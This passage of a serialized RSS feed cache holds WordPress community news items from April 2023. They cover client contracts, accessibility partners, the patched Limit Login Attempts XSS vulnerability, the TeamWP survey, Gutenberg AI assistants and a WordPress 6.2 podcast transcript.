thinks contracts are an essential part of any client facing WordPress work.</p>\n\n\n\n<p>We begin by talking about how the contract is designed as a tool to bring clarity to both parties. You, the website builder, can set out the constraints within which you work, and the client can understand what they can, and cannot, expect from you. Nathan thinks that setting these expectations before the project begins leads to fewer problems later on.</p>\n\n\n\n<p>We talk about the fact that contracts don’t need to contain overly complex legal language, but they do need to be checked by a qualified legal professional before they’re deployed.</p>\n\n\n\n<p>Nathan also explains how he’s refined his contracts over the years, tweaking the wording and the structure, depending upon the project at hand.</p>\n\n\n\n<p>We then get into what you can realistically do should your client breach the contract. Are you able to turn off their website or withhold work that you’ve completed? Nathan’s not really in favour of sending in the lawyers as soon as something goes wrong, rather trying to resolve any conflict through better communication.</p>\n\n\n\n<p>It’s an interesting conversation which makes contracts seem less adversarial and more about ensuring that your WordPress website projects run as smoothly as possible.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Useful links.</h2>\n\n\n\n<p><a href=\"https://training.ithemes.com/\">iThemes Training</a></p>\n\n\n\n<p><a href=\"https://monstercontracts.com/\">MonsterContracts</a></p>\n\n\n\n<p><a href=\"https://birmingham.wordcamp.org/2023/\">WordCamp Birmingham</a></p>\n\n\n\n<p>Nathan&#8217;s &#8220;Dealing with problem clients, building fences around friendly monsters&#8221; <a href=\"https://www.youtube.com/watch?v=jrSH7Mq8ZZs\">webinar</a>.</p>\n\n\n\n<p><a href=\"http://nathaningram.com\">Nathan&#8217;s website</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Apr 2023 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Nathan Wrigley\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"Do The Woo Community: When WooCommerce Developers Need to Find an Accessibility Partner\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=74744\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://dothewoo.io/woocommerce-accessibility-partnerships/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:421:\"<p>With the need to make sure more sites start with being accessible, learn when you should consider bringing in a partner.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/woocommerce-accessibility-partnerships/\">When WooCommerce Developers Need to Find an Accessibility Partner</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Apr 2023 06:03:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"WPTavern: Limit Login Attempts Plugin Patches Severe Unauthenticated Stored XSS Vulnerability\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143554\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"https://wptavern.com/limit-login-attempts-plugin-patches-severe-unauthenticated-stored-xss-vulnerability\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1622:\"<p>Wordfence has <a href=\"https://www.wordfence.com/blog/2023/04/update-now-severe-vulnerability-impacting-600000-sites-patched-in-limit-login-attempts/\">published</a> a security advisory about <a href=\"https://www.cve.org/CVERecord?id=CVE-2023-1912\">a severe unauthenticated stored Cross-Site Scripting vulnerability</a> in the <a href=\"https://wordpress.org/plugins/limit-login-attempts\">Limit Login Attempts</a> plugin, which is active on more than 600,000 WordPress sites. </p>\n\n\n\n<p>The security issue was discovered by Wordfence security researcher Marco Wotschka in January 2023. It was submitted to the WordPress Plugin Security Team, which acknowledged receipt of the report nearly two months later on March 24, 2023.</p>\n\n\n\n<p>&#8220;This can be leveraged by unauthenticated attackers to facilitate a site takeover by injecting malicious JavaScript into the database of an affected site that may execute when a site administrator accesses the logging page,&#8221; Wotschka said.</p>\n\n\n\n<p><a href=\"https://wordpress.org/plugins/limit-login-attempts/\">Version 1.7.2</a> of the plugin patches the vulnerability. It was released on April 4 with a note in the changelog that simply says &#8220;Security fixes.&#8221; Version 1.7.1 and previous versions remain vulnerable. </p>\n\n\n\n<p>In August 2021, the plugin had more than 900,000 active users, and more than 2 million in 2018, but seems to be dying a slow death and is no longer maintained, as it hasn&#8217;t been updated in years.</p>\n\n\n\n<p>Wordfence has more details in the advisory on how the plugin might be exploited and advises users update immediately.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Apr 2023 03:19:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:122:\"WPTavern: TeamWP Launches Team Experience Index To Measure Employee Engagement and Satisfaction in the WordPress Ecosystem\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143527\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:133:\"https://wptavern.com/teamwp-launches-team-experience-index-to-measure-employee-engagement-and-satisfaction-in-the-wordpress-ecosystem\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1868:\"<p>In February 2023, James Giroux <a href=\"https://teamwp.co/blog/the-benefits-of-investing-in-employee-engagement/\">founded TeamWP</a>, a project that aims to advocate for open, people-first workplaces in the WordPress ecosystem. His first initiative was to launch the <a href=\"https://teamexperienceindex.com/\">Team Experience Index</a>, a benchmark employee engagement survey designed specifically for people working in the world of WordPress.</p>\n\n\n\n<p>“The distributed nature of WordPress companies means they often lack the resources and knowledge to create truly open, people-first workplaces,” Giroux said. “The Team Experience Index fills this gap by providing insights and benchmarks that help companies identify strengths and areas for improvement, fostering a more open, collaborative, and innovative work culture.”</p>\n\n\n\n<p>The comprehensive survey will be aggregated and anonymized. It takes approximately 4-7 minutes to complete and includes questions about employee experience, company culture, leadership, management and teamwork, career progression opportunities, professional development, compensation and recognition, and employees&#8217; individual experiences. </p>\n\n\n\n<p>While responses are recorded anonymously, it&#8217;s important to note that the company name is required, along with the employee&#8217;s role and the number of employees. Respondents should be aware that they are collectively giving away a lot of private information and should only share if they believe the insights will have a positive impact on the wider ecosystem.</p>\n\n\n\n<p>Giroux plans to share the initial results of the Team Experience Index at WordCamp Europe in Athens in June 2023. Anyone working at a WordPress product or service company, agency, or hosting company is invited to <a href=\"https://teamexperienceindex.com/\">complete the survey</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Apr 2023 20:55:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"Do The Woo Community: Using WooCommerce Subscriptions at Scale with Devin Price\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=74726\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://dothewoo.io/woocommerce-subscriptions-at-scale/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:436:\"<p>When a site generates 10k orders each hour, and you have 8 million products going out, most of them on subscription, you need to know how to scale.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/woocommerce-subscriptions-at-scale/\">Using WooCommerce Subscriptions at Scale with Devin Price</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Apr 2023 08:10:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"WPTavern: WordPress Developers Are Experimenting With Gutenberg-Native AI Block and Content Assistants\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143492\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"https://wptavern.com/wordpress-developers-are-experimenting-with-gutenberg-native-ai-block-and-content-assistants\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5213:\"<p>As more WordPress <a href=\"https://wordpress.org/plugins/search/chatgpt/\">plugins for AI-generated content and images</a>, chatbots, and assistants, are landing in the official directory, developers are beginning to explore even deeper integration with the block editor. Moving beyond the prototypical content generators that are cobbled together into a plugin, the tools developers are experimenting with today will provide a more deeply integrated experience that works seamlessly with the block editor as a natural extension of its capabilities.</p>\n\n\n\n<p>Last week Human Made CTO Joe Hoyle <a href=\"https://humanmade.com/2023/04/06/wordpress-ai-generative-content-and-blocks/\">published</a> an early preview of generative AI natively integrated into the block editor with a video demonstrating prompts working across various blocks.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">I’ve been working on a WordPress Gutenberg-native AI copilot. The results were pretty astounding to me once I got GPT to “speak Gutenberg” <a href=\"https://t.co/adEfkPRHcb\">pic.twitter.com/adEfkPRHcb</a></p>&mdash; Joe Hoyle (@joe_hoyle) <a href=\"https://twitter.com/joe_hoyle/status/1643952243605925889?ref_src=twsrc%5Etfw\">April 6, 2023</a></blockquote>\n</div>\n\n\n\n<p>&#8220;Taking a native-first approach to integrating generative AI into WordPress, we’ve been experimenting with approaches to a &#8216;WordPress Copilot&#8217; that can &#8216;speak&#8217; Gutenberg / block-editor,&#8221; Hoyle said.</p>\n\n\n\n<p>&#8220;Copy-pasting paragraphs between ChatGPT and WordPress only goes so far, while having the tools directly embedded in the editor for block layout generation, auto-linking, formatting, translation summarization and more open up a world of possibilities and productivity wins for content creators.&#8221;</p>\n\n\n\n<p>Munir Kamal, WordPress developer and founder of Gutenberg Hub, has created a native AI writer with a similar UI to the tool Hoyle previewed, as they both were inspired by the <a href=\"https://www.notion.so/\">Notion app</a>. His preview video demonstrates far more capabilities than the earlier AI content generators for WordPress have implemented.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">I\'ve been working on a native AI writer inspired by Notion, designed to seamlessly integrate into <a href=\"https://twitter.com/hashtag/Gutenberg?src=hash&ref_src=twsrc%5Etfw\">#Gutenberg</a>. Unlike clunky admin approached <a href=\"https://twitter.com/hashtag/AI?src=hash&ref_src=twsrc%5Etfw\">#AI</a> plugins this will be your hidden Ai content assistant. Keep an eye out for it at the <a href=\"https://twitter.com/GutenbergHub?ref_src=twsrc%5Etfw\">@GutenbergHub</a> shop.<a href=\"https://twitter.com/hashtag/WordPress?src=hash&ref_src=twsrc%5Etfw\">#WordPress</a> <a href=\"https://twitter.com/hashtag/chatgpt?src=hash&ref_src=twsrc%5Etfw\">#chatgpt</a> <a href=\"https://t.co/WmCkJCpF0l\">pic.twitter.com/WmCkJCpF0l</a></p>&mdash; Munir Kamal (@m_munirkamal) <a href=\"https://twitter.com/m_munirkamal/status/1644406162966683661?ref_src=twsrc%5Etfw\">April 7, 2023</a></blockquote>\n</div>\n\n\n\n<p>Kamal has tapped into the GPT API to add more options to the AI writer, including the ability to rewrite, improve the generated text, fix grammar, simplify language, make it shorter, make it longer, and translate. He plans to release it as a commercial plugin in his <a href=\"https://shop.gutenberghub.com/\">Gutenberg Hub shop</a> when it&#8217;s ready.</p>\n\n\n\n<img />\n\n\n\n<p>&#8220;With the increasing advancements in AI technology, thanks to OpenAI for taking the leap, I believe it will become an even more integral part of blogging,&#8221; Kamal <a href=\"https://twitter.com/m_munirkamal/status/1644724907694227456\">said</a> when asked about AI and the future of blogging. &#8220;It can assist in generating ideas, improving grammar and structure, and even help with SEO optimization.</p>\n\n\n\n<p>Hoyle is equally optimistic on the future of AI integrated into WordPress tools. It will be exciting to see if his Gutenberg-native AI copilot can be extended to blocks inside the Site Editor, to offer a text prompt-guided design experience without having to click through the tools.</p>\n\n\n\n<p>&#8220;Going through this project has convinced me that LLMs [Large Language Model] have much more potential than I was giving them credit for,&#8221; Hoyle said. &#8220;It feels like there’s still a lot to discover what the models are capable of.</p>\n\n\n\n<p>&#8220;As the availability to GPT-4 (and with it larger token limits) increases, we see a clear path of improvement to what we’ve shown today. The data and information that is stored and available to the Content Management System is ideal for model-training and building a corpus of data specific to the user. Generating, improving and suggesting content of all types that is specific to the data set will be another lead forward in the utility of these tools. We see a future where AI will support and enhance the work we all do, and see the necessity to integrate the technology deeply into the tools and solutions we create.&#8221;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Apr 2023 02:11:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"WordPress.org blog: WP Briefing: Episode 53: A Look at WordPress 6.2 “Dolphy”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=14818\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wordpress.org/news/2023/04/episode-53-a-look-at-wordpress-6-2-dolphy/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9229:\"<p>Named after the multi-instrumentalist Eric Allan Dolphy Jr., WordPress 6.2 &#8220;Dolphy&#8221;&#8216;s high notes are riffed on by WordPress&#8217;s Executive Director, Josepha Haden Chomphosy, in this 53rd episode of the WordPress Briefing.</p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2 class=\"wp-block-heading\">Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br />Logo:&nbsp;<a href=\"https://profiles.wordpress.org/javiarce/\">Javier Arce</a><br />Production:&nbsp;<a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a><br />Song: Fearless First by Kevin MacLeod </p>\n\n\n\n<h2 class=\"wp-block-heading\">Show Notes</h2>\n\n\n\n<ul>\n<li><a href=\"https://wordpress.org/news/2023/03/dolphy/\">WordPress 6.2 &#8220;Dolphy&#8221;</a></li>\n\n\n\n<li><a href=\"https://wordpress.org/news/2023/03/introducing-the-wordpress-developer-blog/\">Introducing the WordPress Developer Blog</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/project/?p=251\">WordPress Contributor Mentorship Program</a></li>\n\n\n\n<li><a href=\"https://wp.me/p2U65r-9Nl\">Call for Volunteers: Contributor Working Group</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/design/?p=11037\">Why Jazz</a></li>\n\n\n\n<li>Make Slack channels <a href=\"https://wordpress.slack.com/archives/C04QZCREJ9W\">#kidscamp</a> and <a href=\"https://wordpress.slack.com/archives/C03JNV77Y57\">#sustainability</a> </li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">Transcript</h2>\n\n\n\n<span id=\"more-14818\"></span>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:00] </p>\n\n\n\n<p>Hello everyone, and welcome to the WordPress Briefing, the podcast where you can catch quick explanations of the ideas behind the WordPress Open Source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks.</p>\n\n\n\n<p>I&#8217;m your host, Josepha Haden Chomphosy. Here we go.</p>\n\n\n\n<p>[00:00:28]</p>\n\n\n\n<p>The latest version of WordPress has shipped. WordPress 6.2, which was named after Eric Dolphy, was released on March 29th. And as is the way with software, there&#8217;s already a minor release underway to catch a few errant issues that folks like you have reported to us.</p>\n\n\n\n<p>It&#8217;s a big release that refines a lot of our design tools, but some of the most important changes are actually to the inserter. If you haven&#8217;t had a chance to get in there and play with it yet, here are the three things that I think you should know. </p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:01:08] </p>\n\n\n\n<p>First, the pattern browser. We&#8217;re all aware of the block inserter by now, and a lot of us probably use the quick options, the keyboard shortcuts, or that kind of inline inserter, that little black box that&#8217;s in the middle of your post.</p>\n\n\n\n<p>If you use the main inserter, that&#8217;s a blue square in the top left of the screen. If you use that to add a block, you can still add individual blocks as usual. But there&#8217;s a new way to browse patterns, and in my opinion, it is so much better. It now brings out this drawer that has like thumbnails of patterns that will work with your theme.</p>\n\n\n\n<p>And if you, like me, know what you want your site to look like, but could not in a million years figure out how to build it from scratch out of individual blocks, then this is the area for you. It was like shopping, but you don&#8217;t have to go through a checkout process at the end, and you still have what you want. It&#8217;s great.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:02:00]&nbsp;</p>\n\n\n\n<p>That&#8217;s also available when you&#8217;re working on templates or template parts, so you can make changes everywhere instead of going page by page. The second thing that I think you should know is about the media browser in that same area where you browse your patterns; you can also now browse for media.</p>\n\n\n\n<p>It lets you look through the images you&#8217;ve already added to your site, but it also lets you search for openly licensed images from Openverse. And if you choose one of those images from Openverse, it inserts the proper attribution for you. You still have to add your own alt text, but that&#8217;s the fun part anyway, right?</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:02:35]&nbsp;</p>\n\n\n\n<p>And number three, a Style Book. So this thing is available in the template editing area, specifically, as is appropriate, given what it actually does. So if you&#8217;re in the template area, toward the top right of the screen is like a half moon day mode, night mode looking icon. If you click on that, you can make changes to things inside your blocks.</p>\n\n\n\n<p>But if you click on the little eyeball icon that&#8217;s just underneath it, it pulls up a style book where you can also see and edit the styles globally. If that didn&#8217;t make sense to you, don&#8217;t worry. I&#8217;ve got you. I&#8217;m about to tell you a bunch of things you can do in here. You can edit the way headings and lists and tables, quotes, and code looks all across the site. You can edit the way images, galleries, files, and videos look using custom CSS.</p>\n\n\n\n<p>Yes. Also, all across the site. And you can edit buttons, separators, and individual blocks. Say it with me &#8212; all across the site. That is not a comprehensive list. There is a ton of stuff. You can see the styles that you have applied across the whole site. You can see them in context, and you can make any changes that you need globally, which means all across the site.</p>\n\n\n\n<p>Yeah. Style Books. What will we think of next? </p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:03:54]&nbsp;</p>\n\n\n\n<p>So those are my three things I think you should know about WordPress right now. As a former WordPress builder who was never really super great with the code, this stuff makes me feel powerful. I just love these changes, and I hope you do too.</p>\n\n\n\n<p> [00:04:07]</p>\n\n\n\n<p>Which brings us now to our small list of big things. First, we just launched the Developer Blog. It&#8217;s over at developer.wordpress.org/news. It has a bunch of content on it that not only is geared specifically toward developers that are using WordPress but especially the folks who are extending WordPress. It gives you kind of an in-depth look at various changes and projects, and implementations and what goes into each one of them.</p>\n\n\n\n<p>So it gives you a bit of like this aspirational overview of stuff that you could do with WordPress and then also gives you an inside look at how you would accomplish it yourself. It&#8217;s very cool. I like it a lot. Head on over there, but we&#8217;ll have a link to the show notes below.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:05:00]&nbsp;</p>\n\n\n\n<p>The second thing is that we have an MVP of our new mentorship program that is underway.</p>\n\n\n\n<p>It should be debuting for essentially testing any day now, a link to the posts detailing that work, just in case you want to join that important initiative. But it is an important thing for me. I think that mentorship is a key element of many of our successful contributors&#8217; onboarding journeys, a part of their story of coming to us.</p>\n\n\n\n<p>And so, creating a mentorship program that is a bit sustainable and looks toward the health of the overall project, I think, is an excellent plan.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:05:38]&nbsp;</p>\n\n\n\n<p>The third thing on our small list of big things is that Matt put out a nice little post about kind of the history of why jazz has this strong background in the WordPress project. It&#8217;s a brief read. I&#8217;ll put a link to that in the show notes as well. But suffice it to say that he&#8217;s saying that jazz has a little bit of learned processes and rules but that the primary expectation is that you&#8217;re able to make of the jazz what you want. Like you get to make your own thing out of it. You get to be extemporaneous. You get to be very measured, whatever it is, that expresses what you are trying to do and what you are trying to say with it.</p>\n\n\n\n<p>That&#8217;s why he feels like jazz is such an important part of the DNA of the WordPress project. Like I said, it&#8217;s a short read. I&#8217;ll put a link to it in the show notes.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:06:30]&nbsp;</p>\n\n\n\n<p>And finally, there are a few working groups that folks can contribute to right now. We don&#8217;t always have working groups. We generally just kind of do stuff inside individual teams. But right now, we&#8217;ve got like the kids camp group, the sustainability group, and of course, that mentorship working group that I mentioned earlier in our list.</p>\n\n\n\n<p>So if you&#8217;re wanting a little change of pace, I&#8217;d drop by their areas in the Making WordPress Slack to see if they have anything that&#8217;s up your alley. </p>\n\n\n\n<p>And that, my friends, is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Apr 2023 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	